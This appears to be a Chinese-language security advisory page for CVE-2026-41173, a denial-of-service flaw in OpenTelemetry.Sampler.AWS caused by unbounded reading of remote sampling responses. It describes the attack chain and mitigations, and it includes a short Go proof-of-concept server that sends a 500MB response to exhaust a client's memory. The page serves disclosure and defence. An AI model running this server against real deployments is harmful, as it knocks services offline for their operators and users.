CVE-2026-41173 CVSS 5.9 中危

CVE-2026-41173 OpenTelemetry AWS X-Ray 内存耗尽漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41173

漏洞类型

拒绝服务

CVSS评分

5.9 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenTelemetry.Sampler.AWS

漏洞概述

OpenTelemetry.Sampler.AWS 在 0.1.0-alpha.8 之前的版本中存在安全漏洞。该组件在从 AWS X-Ray 远程采样端点获取配置时，未对 HTTP 响应体大小进行限制。攻击者若能控制配置端点或实施中间人攻击，可发送超大数据包，导致应用程序内存耗尽从而引发拒绝服务。

技术细节

漏洞位于 AWSXRaySamplerClient.DoRequestAsync 方法内部。该组件在处理来自配置端点的响应时，直接调用 ReadAsStringAsync() 将完整的 HTTP 响应体读入内存字符串，且未设置任何大小限制。虽然默认端点为 localhost，但通过 AWSXRayRemoteSamplerBuilder.SetEndpoint 方法可配置任意端点。攻击者若能控制该端点（如通过供应链投毒或配置劫持），或利用中间人攻击拦截并篡改流量，便可返回一个任意大的响应体。这将导致受害进程进行无限制的堆内存分配，进而造成严重的内存压力、垃圾回收停滞或 OutOfMemoryException 崩溃。

攻击链分析

STEP 1

侦察与配置

攻击者识别目标使用易受攻击的 OpenTelemetry.Sampler.AWS 版本，并诱导或配置目标将采样端点指向攻击者控制的服务器（或通过 MitM 拦截）。

STEP 2

发送恶意响应

当目标应用程序尝试获取采样规则时，攻击者的服务器返回一个包含超大数据包的 HTTP 响应。

STEP 3

资源耗尽

受害进程的 AWSXRaySamplerClient 尝试将整个响应读入内存，导致堆内存耗尽。

STEP 4

拒绝服务

应用程序因 OutOfMemoryException 崩溃或因垃圾回收停滞而无法处理正常请求，导致服务中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC: Malicious server simulating an unbounded AWS X-Ray response
// Attacker hosts this server and sets the victim's sampler endpoint to it.

package main

import (
    "fmt"
    "net/http"
)

func handler(w http.ResponseWriter, r *http.Request) {
    // Simulate a massive sampling rule document
    // This causes the vulnerable client to allocate huge memory
    hugeData := make([]byte, 500*1024*1024) // 500MB
    for i := range hugeData {
        hugeData[i] = 'A'
    }
    
    w.Header().Set("Content-Type", "application/json")
    w.WriteHeader(http.StatusOK)
    w.Write(hugeData)
}

func main() {
    http.HandleFunc("/", handler)
    fmt.Println("Malicious X-Ray server listening on :2000")
    http.ListenAndServe(":2000", nil)
}

影响范围

OpenTelemetry.Sampler.AWS < 0.1.0-alpha.8

防御指南

临时缓解措施

如果无法立即升级，请严格限制采样端点的配置权限，确保端点指向 localhost 或受信任的内网地址，并确保网络环境安全，避免遭受中间人攻击。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表